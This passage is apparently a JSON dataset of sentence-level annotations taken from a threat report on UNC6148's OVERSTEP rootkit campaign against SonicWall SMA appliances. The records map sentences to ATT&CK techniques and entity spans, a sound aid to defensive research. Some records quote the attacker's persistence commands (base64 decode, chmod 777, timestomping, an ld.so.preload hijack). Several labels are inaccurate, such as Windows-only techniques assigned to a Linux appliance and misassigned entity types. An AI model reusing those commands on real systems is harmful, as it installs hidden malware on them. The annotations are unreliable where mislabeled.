"procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s4-106eef", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "Added additional network IOC identified by Sonicwall as being associated with OVERSTEP.", "sentence_text": "Introduction\nGoogle Threat Intelligence Group (GTIG) has identified an ongoing campaign by a suspected financially-motivated threat actor we track as UNC6148, targeting fully patched end-of-life SonicWall Secure Mobile Access (SMA) 100 series appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s5-965aaf", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "Introduction\nGoogle Threat Intelligence Group (GTIG) has identified an ongoing campaign by a suspected financially-motivated threat actor we track as UNC6148, targeting fully patched end-of-life SonicWall Secure Mobile Access (SMA) 100 series appliances.", "sentence_text": "GTIG assesses with high confidence that UNC6148 is leveraging credentials and one-time password (OTP) seeds stolen during previous intrusions, allowing them to regain access even after organizations have applied security updates.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "Leverage stolen credentials and OTP seeds to regain access", "entities": [ { "text": "UNC6148", "start": 40, "end": 47, "label": "ThreatActor" }, { "text": " leveraging", "start": 50, "end": 61, "label": "Action" }, { "text": " regain access", "start": 159, "end": 173, "label": "Action" }, { "text": "credentials and one-time password (OTP) seeds", "start": 62, "end": 107, "label": "MalwareTool" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s6-536505", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "GTIG assesses with high confidence that UNC6148 is leveraging credentials and one-time password (OTP) seeds stolen during previous intrusions, allowing them to regain access even after organizations have applied security updates.", "sentence_text": "Evidence for the initial infection vector was limited, as the actor's malware is designed to selectively remove log entries, hindering forensic investigation; however, it is likely this was through the exploitation of known vulnerabilities.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.001", "name": "Clear Windows Event Logs" } ], "procedure": "Remove log entries to hinder forensics and exploit known vulnerabilities", "entities": [ { "text": " actor", "start": 61, "end": 67, "label": "ThreatActor" }, { "text": "malware", "start": 70, "end": 77, "label": "MalwareTool" }, { "text": " remove log entries", "start": 104, "end": 123, "label": "Action" }, { "text": "hindering forensic investigation", "start": 125, "end": 157, "label": "Action" }, { "text": "exploitation", "start": 202, "end": 214, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s7-1cee97", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "Evidence for the initial infection vector was limited, as the actor's malware is designed to selectively remove log entries, hindering forensic investigation; however, it is likely this was through the exploitation of known vulnerabilities.", "sentence_text": "In this new wave of activity, the actor has deployed a previously unknown persistent backdoor/user-mode rootkit, which GTIG tracks as OVERSTEP.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.002", "name": "Systemd Service" } ], "procedure": "Deploy OVERSTEP persistent backdoor/rootkit", "entities": [ { "text": "the actor", "start": 30, "end": 39, "label": "ThreatActor" }, { "text": "deployed", "start": 44, "end": 52, "label": "Action" }, { "text": "persistent backdoor/user-mode rootkit", "start": 74, "end": 111, "label": "MalwareTool" }, { "text": " OVERSTEP", "start": 133, "end": 142, "label": "MalwareTool" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s8-a9628c", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "In this new wave of activity, the actor has deployed a previously unknown persistent backdoor/user-mode rootkit, which GTIG tracks as OVERSTEP.", "sentence_text": "GTIG assesses with moderate confidence that UNC6148 may have used an unknown zero-day remote code execution vulnerability to deploy OVERSTEP on opportunistically targeted SonicWall SMA appliances.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Use zero-day RCE vulnerability to deploy OVERSTEP on SonicWall SMA appliances", "entities": [ { "text": " UNC6148", "start": 43, "end": 51, "label": "ThreatActor" }, { "text": "zero-day remote code", "start": 77, "end": 97, "label": "MalwareTool" }, { "text": " OVERSTEP", "start": 131, "end": 140, "label": "MalwareTool" }, { "text": "SonicWall SMA appliances", "start": 171, "end": 195, "label": "Infrastructure_Indicator" }, { "text": "execution", "start": 98, "end": 107, "label": "Action" }, { "text": "deploy", "start": 125, "end": 131, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s9-469b4b", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "GTIG assesses with moderate confidence that UNC6148 may have used an unknown zero-day remote code execution vulnerability to deploy OVERSTEP on opportunistically targeted SonicWall SMA appliances.", "sentence_text": "An organization targeted by UNC6148 in May 2025 was posted to the \"World Leaks\" data leak site (DLS) in June 2025, and UNC6148 activity overlaps with publicly reported SonicWall exploitation from late 2023 and early 2024 that has been publicly linked to the deployment of Abyss-branded ransomware (tracked by GTIG as VSOCIETY).", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Post stolen data to World Leaks DLS and deploy VSOCIETY ransomware", "entities": [ { "text": " UNC6148", "start": 27, "end": 35, "label": "ThreatActor" }, { "text": " UNC6148", "start": 118, "end": 126, "label": "ThreatActor" }, { "text": " SonicWall", "start": 167, "end": 177, "label": "Infrastructure_Indicator" }, { "text": "exploitation", "start": 178, "end": 190, "label": "Action" }, { "text": "\"World Leaks\" data leak site (DLS) ", "start": 66, "end": 101, "label": "Infrastructure_Indicator" }, { "text": "VSOCIETY", "start": 317, "end": 325, "label": "ThreatActor" }, { "text": " Abyss-branded ransomware", "start": 271, "end": 296, "label": "MalwareTool" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s10-ddf69c", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "An organization targeted by UNC6148 in May 2025 was posted to the \"World Leaks\" data leak site (DLS) in June 2025, and UNC6148 activity overlaps with publicly reported SonicWall exploitation from late 2023 and early 2024 that has been publicly linked to the deployment of Abyss-branded ransomware (tracked by GTIG as VSOCIETY).", "sentence_text": "This blog post provides technical details on the OVERSTEP rootkit and the UNC6148 campaign to aid defenders in mitigating this threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s11-f1ef72", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "This blog post provides technical details on the OVERSTEP rootkit and the UNC6148 campaign to aid defenders in mitigating this threat.", "sentence_text": "Initial SMA Exploitation to Gain Administrator Credentials 10.2.1.15-81sv ), based on the patching timeline and public reporting of SonicWall n-day exploitation activity throughout 2025.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit SonicWall SMA to gain administrator credentials", "entities": [ { "text": "10.2.1.15-81sv ", "start": 59, "end": 74, "label": "Infrastructure_Indicator" }, { "text": " Gain Administrator Credentials", "start": 27, "end": 58, "label": "Action" }, { "text": "exploitation", "start": 148, "end": 160, "label": "Action" }, { "text": "SonicWall n-day", "start": 132, "end": 147, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s12-b72ce1", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "Initial SMA Exploitation to Gain Administrator Credentials 10.2.1.15-81sv ), based on the patching timeline and public reporting of SonicWall n-day exploitation activity throughout 2025.", "sentence_text": "Analysis of network traffic metadata records suggests that UNC6148 may have initially exfiltrated these credentials from the SMA appliance as early as January 2025.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Exfiltrate credentials from SMA appliance", "entities": [ { "text": " UNC6148", "start": 58, "end": 66, "label": "ThreatActor" }, { "text": " exfiltrated ", "start": 85, "end": 98, "label": "Action" }, { "text": " SMA appliance", "start": 124, "end": 138, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s13-db8c76", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "Analysis of network traffic metadata records suggests that UNC6148 may have initially exfiltrated these credentials from the SMA appliance as early as January 2025.", "sentence_text": "Public reporting from SonicWall and multiple security firms has highlighted several different vulnerabilities that could possibly have been exploited by UNC6148:\nCVE-2021-20038:", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit CVE-2021-20038", "entities": [ { "text": "CVE-2021-20038", "start": 162, "end": 176, "label": "Infrastructure_Indicator" }, { "text": "UNC6148", "start": 153, "end": 160, "label": "ThreatActor" }, { "text": "exploited ", "start": 140, "end": 150, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s14-31bb54", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "Public reporting from SonicWall and multiple security firms has highlighted several different vulnerabilities that could possibly have been exploited by UNC6148:\nCVE-2021-20038:", "sentence_text": "This is a memory corruption vulnerability that can be executed to gain code execution; however, Rapid7's public exploit can make up to 200,000 HTTP requests and could take over an hour to execute, suggesting a widespread campaign may not take advantage of this vulnerability.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Execute memory corruption vulnerability to gain code execution", "entities": [ { "text": " executed ", "start": 53, "end": 63, "label": "Action" }, { "text": "gain code execution", "start": 66, "end": 85, "label": "Action" }, { "text": "HTTP", "start": 143, "end": 147, "label": "Infrastructure_Indicator" }, { "text": "memory corruption", "start": 10, "end": 27, "label": "Action" }, { "text": "execute", "start": 188, "end": 195, "label": "Action" }, { "text": "Rapid7's public exploit", "start": 96, "end": 119, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s15-b40cc3", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "This is a memory corruption vulnerability that can be executed to gain code execution; however, Rapid7's public exploit can make up to 200,000 HTTP requests and could take over an hour to execute, suggesting a widespread campaign may not take advantage of this vulnerability.", "sentence_text": "Truesec identified this as a plausible entrypoint for intrusion activity they observed in late 2023 targeting a SonicWall SMA.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Target SonicWall SMA for intrusion activity", "entities": [ { "text": " SonicWall SMA", "start": 111, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "3 targeting", "start": 98, "end": 109, "label": "Action" }, { "text": " intrusion activity", "start": 53, "end": 72, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s16-97a77e", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "Truesec identified this as a plausible entrypoint for intrusion activity they observed in late 2023 targeting a SonicWall SMA.", "sentence_text": "CVE-2024-38475: Unauthenticated path traversal vulnerability in Apache HTTP Server, which affected the SMA 100 series ( SonicWall advisory , Orange CyberDefense/SCRT blog post )\nThis can be exploited on the SMA 100 series specifically to exfiltrate two different SQLite databases, temp.db and persist.db , which store sensitive information including user account credentials, session tokens, and OTP seed values.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit CVE-2024-38475 to exfiltrate temp.db and persist.db databases containing credentials and OTP seeds", "entities": [ { "text": "CVE-2024-38475", "start": 0, "end": 14, "label": "Infrastructure_Indicator" }, { "text": "Apache HTTP Server", "start": 64, "end": 82, "label": "Infrastructure_Indicator" }, { "text": "SQLite databases", "start": 263, "end": 279, "label": "Infrastructure_Indicator" }, { "text": "temp.db ", "start": 281, "end": 289, "label": "Infrastructure_Indicator" }, { "text": "persist.db", "start": 293, "end": 303, "label": "Infrastructure_Indicator" }, { "text": " OTP seed values", "start": 395, "end": 411, "label": "Infrastructure_Indicator" }, { "text": "session tokens", "start": 376, "end": 390, "label": "Infrastructure_Indicator" }, { "text": "user account credentials", "start": 350, "end": 374, "label": "Infrastructure_Indicator" }, { "text": " exfiltrate", "start": 237, "end": 248, "label": "Action" }, { "text": " exploited ", "start": 189, "end": 200, "label": "Action" }, { "text": "SMA 100 series ", "start": 207, "end": 222, "label": "Infrastructure_Indicator" }, { "text": "SMA 100 series", "start": 103, "end": 117, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s17-ae6365", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "CVE-2024-38475: Unauthenticated path traversal vulnerability in Apache HTTP Server, which affected the SMA 100 series ( SonicWall advisory , Orange CyberDefense/SCRT blog post )\nThis can be exploited on the SMA 100 series specifically to exfiltrate two different SQLite databases, temp.db and persist.db , which store sensitive information including user account credentials, session tokens, and OTP seed values.", "sentence_text": "CVE-2021-20035:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s18-c63aaf", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "CVE-2021-20035:", "sentence_text": "Authenticated remote code execution vulnerability ( SonicWall advisory , ArcticWolf report )", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit authenticated RCE vulnerability", "entities": [ { "text": "SonicWall advisory", "start": 52, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "ArcticWolf report", "start": 73, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "remote code execution ", "start": 14, "end": 36, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s19-d319cd", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "Authenticated remote code execution vulnerability ( SonicWall advisory , ArcticWolf report )", "sentence_text": "This is a command injection vulnerability in the handler for /cgi-bin/sitecustomization POST requests.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit command injection in /cgi-bin/sitecustomization POST handler", "entities": [ { "text": " command injection", "start": 9, "end": 27, "label": "Action" }, { "text": " /cgi-bin/sitecustomization POST requests", "start": 60, "end": 101, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s20-0953cd", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 20, "context_before": "This is a command injection vulnerability in the handler for /cgi-bin/sitecustomization POST requests.", "sentence_text": "Arctic Wolf and SonicWall reported on this vulnerability being exploited in the wild in April 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s21-3ef412", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 21, "context_before": "Arctic Wolf and SonicWall reported on this vulnerability being exploited in the wild in April 2025.", "sentence_text": "CVE-2021-20039: Authenticated remote code execution vulnerability ( SonicWall advisory , dfir.ch blog post , AttackerKB entry )", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s22-fa87b6", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 22, "context_before": "CVE-2021-20039: Authenticated remote code execution vulnerability ( SonicWall advisory , dfir.ch blog post , AttackerKB entry )", "sentence_text": "This is a command injection vulnerability in the request handler for /cgi-bin/viewcert dfir.ch reported this vulnerability being used to exploit SonicWall SMAs in an intrusion that led to the deployment of Abyss-branded ransomware in March 2024, with similar intrusion artifacts to Mandiant's investigation.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit /cgi-bin/viewcert command injection to deploy Abyss ransomware", "entities": [ { "text": "Abyss-branded ransomware", "start": 206, "end": 230, "label": "Action" }, { "text": "SonicWall SMA", "start": 145, "end": 158, "label": "Infrastructure_Indicator" }, { "text": " exploit", "start": 136, "end": 144, "label": "Action" }, { "text": " /cgi-bin/viewcert dfir.ch", "start": 68, "end": 94, "label": "Infrastructure_Indicator" }, { "text": "command injection ", "start": 10, "end": 28, "label": "Action" }, { "text": " intrusion", "start": 165, "end": 175, "label": "Action" }, { "text": "deployment", "start": 192, "end": 202, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s23-fb6951", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 23, "context_before": "This is a command injection vulnerability in the request handler for /cgi-bin/viewcert dfir.ch reported this vulnerability being used to exploit SonicWall SMAs in an intrusion that led to the deployment of Abyss-branded ransomware in March 2024, with similar intrusion artifacts to Mandiant's investigation.", "sentence_text": "CVE-2025-32819:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s24-9b2be1", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 24, "context_before": "CVE-2025-32819:", "sentence_text": "Authenticated file deletion vulnerability ( SonicWall advisory , Rapid7 report )\nUsing a crafted HTTP request, this vulnerability can be exploited to cause a targeted SonicWall SMA to revert the built-in administrator credentials to password , granting the attacker administrator access.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1078.003", "name": "Local Accounts" } ], "procedure": "Exploit file deletion vulnerability via crafted HTTP request to reset admin credentials", "entities": [ { "text": " HTTP ", "start": 96, "end": 102, "label": "Infrastructure_Indicator" }, { "text": " exploited ", "start": 136, "end": 147, "label": "Action" }, { "text": " targeted", "start": 157, "end": 166, "label": "Action" }, { "text": "SonicWall SMA ", "start": 167, "end": 181, "label": "Infrastructure_Indicator" }, { "text": " revert", "start": 183, "end": 190, "label": "Action" }, { "text": " granting the attacker administrator access", "start": 243, "end": 286, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s25-27633e", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 25, "context_before": "Authenticated file deletion vulnerability ( SonicWall advisory , Rapid7 report )\nUsing a crafted HTTP request, this vulnerability can be exploited to cause a targeted SonicWall SMA to revert the built-in administrator credentials to password , granting the attacker administrator access.", "sentence_text": "There are several different paths UNC6148 could have taken with the aforementioned vulnerabilities, or possibly a different vulnerability not mentioned here.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-37_mandiant_report-p1-s26-854f59", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 26, "context_before": "There are several different paths UNC6148 could have taken with the aforementioned vulnerabilities, or possibly a different vulnerability not mentioned here.", "sentence_text": "Exploitation of the previously mentioned authenticated bugs would require UNC6148 to already have some level of credentials to the SMA appliance, making them less likely to have been abused, but still worth mentioning due to their in-the-wild exploited status.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Exploit authenticated vulnerabilities using obtained credentials", "entities": [ { "text": "Exploitation", "start": 0, "end": 12, "label": "Action" }, { "text": "UNC6148", "start": 74, "end": 81, "label": "Action" }, { "text": "SMA appliance", "start": 131, "end": 144, "label": "Action" }, { "text": "y have some level of credentials", "start": 91, "end": 123, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s27-b7875d", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 27, "context_before": "Exploitation of the previously mentioned authenticated bugs would require UNC6148 to already have some level of credentials to the SMA appliance, making them less likely to have been abused, but still worth mentioning due to their in-the-wild exploited status.", "sentence_text": "It is also possible that credentials could have been obtained through infostealer logs or credential marketplaces, but GTIG was unable to identify any direct credential exposure related to the abused SMA appliance credentials.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.001", "name": "Malware" } ], "procedure": "Obtain credentials via infostealer logs or credential marketplaces", "entities": [ { "text": "infostealer logs ", "start": 70, "end": 87, "label": "MalwareTool" }, { "text": " abused SMA appliance credentials", "start": 192, "end": 225, "label": "Infrastructure_Indicator" }, { "text": "credential marketplaces", "start": 90, "end": 113, "label": "MalwareTool" }, { "text": "exposure", "start": 169, "end": 177, "label": "Action" }, { "text": " obtained ", "start": 52, "end": 62, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s28-ed5320", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 28, "context_before": "It is also possible that credentials could have been obtained through infostealer logs or credential marketplaces, but GTIG was unable to identify any direct credential exposure related to the abused SMA appliance credentials.", "sentence_text": "Subsequent SMA Compromise and OVERSTEP Deployment", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Compromise SMA and deploy OVERSTEP", "entities": [ { "text": "SMA ", "start": 11, "end": 15, "label": "Infrastructure_Indicator" }, { "text": "Compromise", "start": 15, "end": 25, "label": "Action" }, { "text": " Deployment", "start": 38, "end": 49, "label": "Action" }, { "text": "OVERSTEP", "start": 30, "end": 38, "label": "MalwareTool" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s29-645925", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 29, "context_before": "Subsequent SMA Compromise and OVERSTEP Deployment", "sentence_text": "Once the SSL VPN session was established, the attacker spawned a reverse shell on the targeted SMA appliance.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Spawn a reverse shell on the targeted SMA appliance.", "entities": [ { "text": "spawned a reverse shell on the targeted SMA appliance", "start": 55, "end": 108, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s30-4e2c6a", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 30, "context_before": "Once the SSL VPN session was established, the attacker spawned a reverse shell on the targeted SMA appliance.", "sentence_text": "Shell access should not be possible by design on these appliances, and Mandiant's joint investigation with the SonicWall Product Security Incident Response Team (PSIRT) did not identify how UNC6148 established this reverse shell.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1210", "name": "Exploitation of Remote Services" }, { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Establish reverse shell on restricted appliance", "entities": [ { "text": "UNC6148", "start": 190, "end": 197, "label": "ThreatActor" }, { "text": " established ", "start": 197, "end": 210, "label": "Action" }, { "text": "reverse shell", "start": 215, "end": 228, "label": "MalwareTool" }, { "text": "Shell access ", "start": 0, "end": 13, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s31-7922a9", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 31, "context_before": "Shell access should not be possible by design on these appliances, and Mandiant's joint investigation with the SonicWall Product Security Incident Response Team (PSIRT) did not identify how UNC6148 established this reverse shell.", "sentence_text": "It's possible the reverse shell was established via exploitation of an unknown vulnerability by UNC6148.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Establish reverse shell via exploitation of unknown vulnerability", "entities": [ { "text": " reverse shell", "start": 17, "end": 31, "label": "MalwareTool" }, { "text": " established", "start": 35, "end": 47, "label": "Action" }, { "text": "exploitation of ", "start": 52, "end": 68, "label": "Action" }, { "text": "unknown vulnerability ", "start": 71, "end": 93, "label": "Infrastructure_Indicator" }, { "text": " UNC6148", "start": 95, "end": 103, "label": "ThreatActor" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s32-d2f0fe", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 32, "context_before": "It's possible the reverse shell was established via exploitation of an unknown vulnerability by UNC6148.", "sentence_text": "Following this initial activity, the attacker deployed the OVERSTEP backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": null, "procedure": "The attacker deployed the OVERSTEP backdoor.", "entities": [ { "text": "the attacker", "start": 33, "end": 45, "label": "ThreatActor" }, { "text": "deployed the OVERSTEP backdoor", "start": 46, "end": 76, "label": "Action" }, { "text": "OVERSTEP backdoor", "start": 59, "end": 76, "label": "MalwareTool" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s33-74993f", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 33, "context_before": "Following this initial activity, the attacker deployed the OVERSTEP backdoor.", "sentence_text": "This process involved executing a series of commands to decode the binary from Base64 into the persistent /cf directory with the filename xxx.elf , moving it to /usr/lib/libsamba-errors.so.6 , and ensuring persistence by adding its path to /etc/ld.so.preload cd /cf; touch xxx.elf;\nopenssl enc -base64 -d", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Decode Base64 payload to /cf/xxx.elf, move to /usr/lib/libsamba-errors.so.6, and add to /etc/ld.so.preload for persistence", "entities": [ { "text": "Base64 ", "start": 79, "end": 86, "label": "Infrastructure_Indicator" }, { "text": "/usr/lib/libsamba-errors.so.6", "start": 161, "end": 190, "label": "Infrastructure_Indicator" }, { "text": "/etc/ld.so.preload", "start": 240, "end": 258, "label": "Infrastructure_Indicator" }, { "text": "xxx.elf ", "start": 138, "end": 146, "label": "MalwareTool" }, { "text": "ensuring persistence", "start": 197, "end": 217, "label": "Action" }, { "text": " adding", "start": 220, "end": 227, "label": "Action" }, { "text": "cd /cf; touch xxx.elf;", "start": 259, "end": 281, "label": "MalwareTool" }, { "text": " /cf directory", "start": 105, "end": 119, "label": "Infrastructure_Indicator" }, { "text": " executing", "start": 21, "end": 31, "label": "Action" }, { "text": "decode", "start": 56, "end": 62, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s34-c58a5f", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 34, "context_before": "This process involved executing a series of commands to decode the binary from Base64 into the persistent /cf directory with the filename xxx.elf , moving it to /usr/lib/libsamba-errors.so.6 , and ensuring persistence by adding its path to /etc/ld.so.preload cd /cf; touch xxx.elf;\nopenssl enc -base64 -d", "sentence_text": "[REDACTED] >>xxx.elf;\nchmod 777 /usr/lib/libsamba-errors.so.6;\ntouch -c /usr/lib/libsamba-errors.so.6 -r echo /usr/lib/libsamba-errors.so.6 > /etc/ld.so.preload;\nchown root:root /usr/lib/libsamba-errors.so.6;\nchmod 777 /usr/lib/libsamba-errors.so.6;\ntouch -c /usr/lib/libsamba-errors.so.6 -r echo /usr/lib/libsamba-errors.so.6 > /etc/ld.so.preload;\narp", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1222.001", "name": "Windows File and Directory Permissions Modification" }, { "id": "T1070.006", "name": "Timestomp" }, { "id": "T1543.002", "name": "Systemd Service" } ], "procedure": "Set permissions on libsamba-errors.so.6, add to ld.so.preload, and modify file timestamps", "entities": [ { "text": "usr/lib/libsamba-errors.so.6;", "start": 220, "end": 249, "label": "MalwareTool" }, { "text": "usr/lib/libsamba-errors.so.6;", "start": 179, "end": 208, "label": "MalwareTool" }, { "text": "usr/lib/libsamba-errors.so.6", "start": 260, "end": 288, "label": "MalwareTool" }, { "text": "xxx.elf", "start": 13, "end": 20, "label": "MalwareTool" }, { "text": "/usr/lib/libsamba-errors.so.6", "start": 32, "end": 61, "label": "MalwareTool" }, { "text": " /usr/lib/libsamba-errors.so.6", "start": 71, "end": 101, "label": "MalwareTool" }, { "text": " /usr/lib/libsamba-errors.so.6", "start": 109, "end": 139, "label": "MalwareTool" }, { "text": " /usr/lib/libsamba-errors.so.6", "start": 296, "end": 326, "label": "MalwareTool" }, { "text": "/etc/ld.so.preload", "start": 329, "end": 347, "label": "Infrastructure_Indicator" }, { "text": "/etc/ld.so.preload;", "start": 142, "end": 161, "label": "Infrastructure_Indicator" }, { "text": "chmod 777 /usr/lib/libsamba-errors.so.6", "start": 22, "end": 61, "label": "Action" }, { "text": "chown root:root /usr/lib/libsamba-errors.so.6", "start": 162, "end": 207, "label": "Action" }, { "text": "chmod 777 /usr/lib/libsamba-errors.so.6;", "start": 209, "end": 249, "label": "Action" }, { "text": "touch -c /usr/lib/libsamba-errors.so.6 -r echo /usr/lib/libsamba-errors.so.6 > /etc/ld.so.preload;", "start": 63, "end": 161, "label": "Action" }, { "text": "touch -c /usr/lib/libsamba-errors.so.6 -r echo /usr/lib/libsamba-errors.so.6 > /etc/ld.so.preload;", "start": 250, "end": 348, "label": "Action" } ] }, { "uid": "mandiant-37_mandiant_report-p1-s35-5c3c2c", "source": "mandiant", "doc_id": "37_mandiant_report", "page_number": 1, "sentence_id": 35, "context_before": 